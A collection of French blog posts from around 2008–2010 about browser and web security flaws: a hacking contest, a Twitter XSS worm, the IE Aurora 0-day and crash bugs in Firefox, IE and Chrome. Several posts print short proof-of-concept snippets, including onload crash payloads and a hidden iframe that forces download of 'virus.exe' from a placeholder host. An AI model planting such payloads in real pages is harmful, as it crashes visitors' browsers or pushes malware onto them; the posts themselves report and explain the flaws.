Le premier à prouver son hack aux organisateurs du jeu remportera un iPad.

Pourquoi un tel concours ?

Ce type de concours permet de tester la sécurité de nombreux éléments qui jouent un rôle plus ou moins important dans le cadre de la création de site internet (forum, blogs, portails ecommerce, etc.).

« Nous souhaitons sensibiliser les webmasters, les développeurs, agences de communication etc, au fait que la mise en œuvre d’application web peut comporter des risques aussi bien pour les données hébergées sur le serveur que pour les internautes qui visitent ce dernier. »

Sont interdits :

1. Les attaques de type DDOS, Dos et social engineering (visa, mastercard, paypal…)
2. L’utilisation de logiciel (scanner de vulnérabilité, logiciel pour aider à l’injection de code arbitraire)

Vous l’aurez compris, ce concours oeuvre pour un web plus « sécurise ». Bien que je ne sois pas certains que cela fasse bouger les lignes, ça permettra à certains de débuter l’année de façon intensive

Le concours débute à la première seconde de l’année 2011, c’est à dire dans quelques heures.

Pour vous inscrire ça se passe ici (le règlement est ici) mais vous devez vous inscrire avant la fin de l’année 2010 !
Compte twitter de l’opération - Interview de Eric Seguinard chez CCM

Article original écrit par Mr Xhark publié sur Blogmotion le 31/12/2010 | 19 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Durant quelques heures aujourd’hui nous avons eu le droit à une nouvelle #Twitpocalypse qui a pollué des dizaines de milliers de timeline.

Des dizaines de milliers d’utilisateurs ont été victimes de plusieurs vers se propageant via le réseau social, de façon particulièrement efficace à cause d’une faille XSS. On parle de « ver » par abus de langage, puisqu’il s’agit d’une méthode malveillante qui s’est propagée de façon quasi-autonome (cf. définition).

Conséquence : de nombreux tweets publiés à l’insu des utilisateurs comme en témoigne le tweet de Marc :

Ce code Javascript permet de répliquer un code couleur noir dès qu’il est survolé par la souris (onmouseover en JS) pour les utilisateurs du site Twitter.com. D’autres utilisateurs ont eu le droit à des redirections vers des sites pornos comme en témoigne Sophos :

Une autre faille ne nécessitait même aucun survol pour s’auto-propager, il suffisait de consulter sa timeline comme en témoigne Deherve.

Alors que Twitter compte reconquérir ses utilisateurs qui utilisent une application tierce (TweetDeck, Seesmic, etc.) au lieu de Twitter.com c’est plutôt mal engagé. En effet, seule la version web était vulnérable. La faille exploite du code html+javascript non pris en charge par les clients tiers donc non touchés.

Sur son blog, Twitter assure avoir localisé et corrigé la faille quelques heures après cette découverte. Ce genre de faille reste tout à fait dangereuse puisqu’elle peut paralyser complètement le réseau social utilisé quotidiennement par millions de personnes et de sociétés.

On relèvera au passage le titre du billet précédent sur le blog twitter qui était « A Better Twitter« … à méditer.

Via et via

Article original écrit par Mr Xhark publié sur Blogmotion le 21/09/2010 | 8 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Je vous propose au travers de ce billet un résumé de la situation qui s’éparpille dans un tous les sens sur les sites d’informations.

Internet explorer 6, 7 et 8 sont impactés par cette faille permettant l’exécution de code arbitraire à distance (remote shell). Microsoft annonce d’ores et déjà qu’un correctif d’urgence sera beinttôt  disponible sans pour autant attendre les patch Tuesday (tous les deuxièmes mardi de chaque mois). Microsoft tente de minimiser cette information en recommandant aux utilisateurs de IE 6 & 7 de migrer vers la version 8 dans laquelle la protection Data Execution Prevention est activée par défaut.

Personnellement je vous conseille d’utiliser un navigateur alternatif tel que Firefox, Opera reconnus stable et sans failles béantes.

Voici l’information officielle des contacts Microsoft Entreprise :

Internet Explorer 6
Windows 2000 : Exploitable
Windows XP :  Exploitable (et exploité)
Windows Vista et 7 : néant

Internet Explorer 7
Windows 2000 : néant (IE 7 n’est pas disponible pour Windows 2000) Windows XP : Potentiellement exploitable mais l’attaque en cours est sans effet
Windows Vista : grâce au mode protégé d’IE, l’exploitation ne fonctionne pas.
Windows 7 : néant

Internet Explorer 8
Windows 2000 : néant (IE 8 n’est pas disponible pour Windows 2000)
Windows XP : Grâce à la protection DEP active par défaut sur Windows XP SP3, l’exploitation ne fonctionne pas.
Windows Vista : Grâce au mode protégé d’IE et à la protection DEP, l’exploitation ne fonctionne pas.
Windows 7 : Grâce au mode protégé d’IE et à la protection DEP actives par défaut, l’exploitation ne fonctionne pas.

Voici les conseils que nous vous recommandons de suivre pour mieux vous protéger si vous utilisez Windows XP avec Internet Explorer 6 :

1. Si cela vous est possible, Installez Internet Explorer 8 ;
2. S’il ne vous est pas possible d’installer Internet Explorer 8, passez à la dernière version de Service Pack en appliquant le Service Pack 3 de Windows XP (et toutes les mises à jour postérieures au SP3) ;
3. A défaut d’appliquer le SP3, si vous utilisez Windows XP SP2, vous pouvez activer manuellement la protection DEP (Data Execution Prevention) ;
4. Mettre en œuvre les éventuelles autres solutions de contournement et atténuations citées dans l’avis de sécurité.

Une faille 0-Day c’est quoi ?

Une fois 0-Day correspond à des attaques qui exploitent une faille d’un programme jusqu’alors inconnue. Cela va peut-être en surprendre quelques-uns, mais certaines failles sont connues des éditeurs et pas corrigées pour autant… voilà qui les différencie avec les failles 0-Day.

Détecter la vulnérabilité avec Stinger

George Kurtz (McAfee Chief’s Technology Officer) a publié un long billet sur son blog au sujet de cette attaque Aurora que je vous invite à lire. L’éditeur antiviral McAfee a semble-t-il été le premier à comprendre que l’attaque se basait sur Internet Explorer. Une attaque très minutieuse et professionnelle selon 01net.

McAfee Labs vient de mettre un ligne l’utilitaire Stinger pour « Aurora », celui-ci détecte et élimine les menaces associées aux attaques de l’Opération Aurora. Cet utilitaire peut être téléchargé gratuitement à partir du McAfee Threat Center (lien direct) :

Le plus sage étant de mettre à jour Internet Explorer en version 8 (la 9 ne va pas tarder) et de ne plus l’utiliser comme le conseille le CERTA.

Aurora déjà exploitée

Metasploit (projet de sécurité open-source) a d’ores et déjà intégré l’exploit dans son framework. Un billet complet à ce sujet est consultable histoire de montrer à Microsoft que cette faille est importante et qu’il ne faut pas la minimiser.

Conclusion

Le cas le plus problématique se trouve en entreprise. Nombreuses sont encore celles qui utilisent Internet Explorer 6 pour des questions de compatibilité avec des applications qui ne tournent pas sur les versions ultérieures ou migrer vers un autre navigateur.

C’est pour cette raison que Microsoft doit de toutes façon sortir un correctif.

Article original écrit par Mr Xhark publié sur Blogmotion le 20/01/2010 | 5 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Voici ce que l’on peut y voir en modifiant simplement certains paramètres GET de l’URL :

Pour le voir par vous même cliquez-ici (si la faille n’a pas encore été corrigée).

A l’époque des liens raccourcis il est très facile de piéger une victime en profitant de cette faille XSS… pourquoi la société à la pomme ne corrige-t-elle pas cette brèche ?

Via un tweet de Mar1e

Article original écrit par Mr Xhark publié sur Blogmotion le 04/11/2009 | 4 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Le code source concerne la balise « BODY onload » :

<BODY onload="
document.designMode='on';
document.removeChild(document.firstChild);
document.queryCommandState('BackColor');
">

Ce qui provoque :

Cette faille active le mode d’édition « rich text » (variable), puis enlève le noeud (objet) pour ensuite intérroger l’état actuel de la commande ‘BackColor’ (qui n’existe plus étant donné que le noeud a été supprimé), et Firefox ne sait plus quoi faire, donc il plante… enfin c’est ce que j’en ai compris, si votre explication est meilleure les commentaires sont open !

En espérant que Mozilla colmate la faille assez rapidement parce que j’en connais qui vont s’arracher les cheveux si Firefox se ferme sans prévenir, la restauration des onglets ouverts avant le plantage ne suffisant pas toujours pour récupérer des textarea notamment

Démo : cliquez ici pour planter Firefox (v3.0.7 max)

Source

Article original écrit par Mr Xhark publié sur Blogmotion le 24/02/2009 | 2 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

Le principe est relativement simple : on demande à IE de lire le contenu d’un pointeur vide au chargement de la page (cliquez ici pour essayer) :

<body onload=screen[""]>

Rien d’alarmant toutefois puisque IE considère le code comme potentiellement dangereux :

M’enfin c’est tout de même pas rassurant de voir que de tels exploits soit encore d’actualité dans les versions 7 et 8 d’Intenet Explorer (IE 6 encore je veux bien…).

On se souvient par ailleurs du fameux site de crash IE

Télécharger Firefox

Article original écrit par Mr Xhark publié sur Blogmotion le 15/01/2009 | 6 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons

C’est donc tombé, 2 failles DoS (Denial of Service) pour Google Chrome.

Vous êtes septiques et pensez que ces failles doitvent encore mériter de nombreuses bidouilles ?

1 – La Faille DoS

Ouvre Google Chrome et revenez sur cet article, puis survollez ce texte avec votre souris (le clic n’est même pas nécessaire). Alors heureux ? Ah oui, très heureux

Le simple fait de mettre « xhark:% » dans la barre d’adresse fait planter Google Chrome (aucun rapport avec moi, vous pouvez mettre « toto% ») . Je dis bien Google Chrome et non l’onglet en cours, car Google avait prévu de parquer chaque onglet pour ne pas avoir un navigateur complètement planté à cause d’un seul onglet. Résultat : c’est pas le cas, Chrome plante complètement :

J’ai testé la faille sur XP SP3 et Vista SP1, tous deux impactés.

Le problème vient du fichier chrome.dll (version 0.2.149.27), en fait le navigateur ne comprend pas le type de fichier envoyé et plante.

2 – La faille du téléchargement automatique

Cette faille est beaucoup plus préoccupante que la première… elle permet de forcer un téléchargement sur votre machine, sans aucune confirmation (un exécutable ou virus par exemple), via une simple iframe (fonctionne sur Vista SP1 et XP SP3) :

<script>
document.write(‘<iframe src= »http://www.example.com/virus.exe » frameborder= »0″ width= »0″ height= »0″>’);
</script>

Simple mais efficace pour celui qui n’a pas d’antivirus ou autre. Nous pouvons même imaginer de mettre un fichier très lourd, ce qui saturera votre connexion internet. Je pense à nos amis de belgiques qui ont des quotas imposés par leur fournisseurs d’accès (et oui ça existe encore ! ). Ou encore à celui dont l’ip fera parti d’une liste à surveiller par le gouvernement car via l’iframe le lien contenait un lien vers un site pédophile ou autre…

Bref vous l’aurez compris ce genre de faille n’est pas à prendre à la légère. Voilà qui devrait calmer tous ceux qui ont déjà abandonné leur Firefox ou Opera. Tous deux restent dans le domaine de la sécurité deux gros poids lourds

Pourquoi s’alarmer ?

Ce qui me fait plutôt peur, c’est lorsque je regarde les statistiques du blog au niveau des navigateurs : hier, vous étiez 21,3% à afficher le blog avec Chrome, sûrement pour l’essayer hein Mais cela veut dire que le nombre de gens utilisant Chrome ne cessera d’augmenter, et que si Google ne réagit pas très rapidement sur ce genre de problèmes Chrome risque très vite d’avoir mauvaise réputation… et vous auriez raison de le penser.

La version de Google Chrome impactée par cette faille est la v. bêta 0.2.149.27.

Faille numéro 1 reconnue par Google

Article original écrit par Mr Xhark publié sur Blogmotion le 04/09/2008 | 5 commentaires |
Attention : l'intégralité de ce billet est protégée par la licence Creative Commons